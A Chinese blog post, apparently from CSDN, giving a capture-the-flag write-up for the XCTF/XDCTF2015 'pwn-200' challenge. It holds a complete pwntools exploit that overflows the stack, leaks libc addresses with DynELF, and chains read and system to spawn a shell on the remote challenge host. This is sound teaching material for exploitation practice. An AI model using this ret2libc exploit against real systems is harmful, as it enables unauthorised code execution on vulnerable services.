pwn-200(xctf)

最新推荐文章于 2021-02-20 21:49:03 发布
最新推荐文章于 2021-02-20 21:49:03 发布
阅读量603 收藏 2
点赞数 1
分类专栏: # xctf(pwn高手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43868725/article/details/107878667
版权

0x0 程序保护和流程

保护:

protect

流程:

main()

main

overflow()

overflow

明显的栈溢出漏洞。

0x1 利用过程

1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。

2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。

3.payload的构造(以DynELF为例):

  • payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)+p32(sys_addr)+p32(0)+p32(bss_addr) #这种构造方式需要将read的参数pop出栈后再调用system函数。
  • payload=padding+p32(read_plt)+p32(sys_addr)+p32(0)+p32(bss_addr)+p32(8) #这种构造方式利用了read函数的三个参数中的前两个可以和system函数的返回地址和参数相吻合,所以不需要清栈。

0x2 exp

from pwn import *
sh=remote('220.249.52.133','54489')
# sh=process('./a')
elf=ELF('./a')
write_plt=elf.plt['write']
read_plt=elf.plt['read']
bss_addr=elf.bss()
padding=(0x6c+4)*'a'
main_addr=0x080484BE
ppp_addr=0x080485cd


def leak(address):
    payload=padding+p32(write_plt)+p32(main_addr)+p32(1)+p32(address)+p32(4)
    sh.sendafter("Welcome to XDCTF2015~!\n",payload)
    return sh.recv(4)

d=DynELF(leak,elf=elf)
sys_addr=d.lookup('system','libc')
# payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)+p32(sys_addr)+p32(0)+p32(bss_addr)
payload=padding+p32(read_plt)+p32(sys_addr)+p32(0)+p32(bss_addr)+p32(8)
sh.sendafter("Welcome to XDCTF2015~!\n",payload)
sh.send("/bin/sh\x00")
sh.interactive()
whiteh4nd
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 pwn-200
winterze的博客
04-04 629
攻防世界 pwn-200 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/pwn/pwn-200' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8...
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 405
做题记录
[攻防世界 pwn]——pwn-200
Y_peak的博客
02-20 584
[攻防世界 pwn]——pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一般可以栈溢出。但是没有system和"/bin/sh"。首先, 利用已知的函数leek出来一个地址返回地址是可循环调用的地方,一般是用puts,或者write函数leek地址, 偶尔有时是printf函数, 然后找出libc版本计算偏移, 找到system和’/bin/sh’ 地址。重新构造rop链进而获
pwn200 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列21
重新启程
12-25 1293
题目地址:pwn-200 不知不觉已经到了高级进阶区的第十题了,攻防世界设计的学习过程,确实降低了学习曲线的陡峭程度。 废话不说,看看题目先 看一下难度星级陡然提升到5颗星,心里是不是有点懵逼!哈哈 先看看保护机制: [*] '/ctf/work/python/pwn200/9c6084f8a3b2473e8a9e9815099bfec5' Arch: i386-32-...
(攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2182
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn-200题目文件
02-16
pwn-200题目文件
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
xctf攻防世界pwn基础题解(新手食用)
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
pwn1(xctf)
weixin_43868725的博客
08-08 485
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
xctf pwn1
qq_41071646的博客
05-14 956
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
XCTF-pwn level2 - Writeup
菜小狗.的博客
08-02 4972
XCTF-pwn-level2 WP 终于可以写这个pwn题的wp咯~ 很开心,说明我又有一些收获来解决了一些问题 题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ 先将elf文件下载丢到乌班图里查看一下文件类型,通过checksec查看一下保护情况最后在运行一下瞅瞅到底运行起来是杂肥似。 可以看到NX这项保护是开启的状态,这意味着:栈中数据没有执行...
XDCTF-2015 pwn-200 backdoorctf-2015 echo
qq_41071646的博客
05-17 659
XDCTF-2015 pwn-200 简单的泄露基址 这里就不多讲了 #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=remote("111.198.29.45",32529) io=process("./pwn") elf=ELF("./pwn") li...
pwn线上环境搭建
weixin_43868725的博客
05-26 1639
ctf pwn 题目部署 在做ctf pwn的题目的时候总会忍不住的想,这个目标主机的环境是怎样搭建的。所以本文旨在快速的搭建一个ctf pwn的远程环境。 0x0 演示环境 在Vmware15.5.2中Ubuntu16.04.6(desktop-amd64)实现环境的搭建。系统安装可以参考。 0x1 环境配置 这里用的是一个GitHub上的一个项目pwn_deploy_chroot,参照大神亲自写的blog如何安全快速地部署多道 ctf pwn 比赛题目。 项目特点。 一次可以部署多个题目到一个
PWN学习笔记--HCTF2017 pwn200
I have a dream
04-25 424
参考链接:https://bbs.pediy.com/thread-224645.htm 考点:格式化字符串、GOT覆盖 思路:首先利用格式化字符串泄露出puts函数的实际地址,然后根据libc计算出system的地址。接着用得到的system的地址覆盖atoi的got地址,最后传入/bin/sh参数即可。 漏洞程序: 2017湖湘杯pwn200 漏洞利用程序: from pwn import ...
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值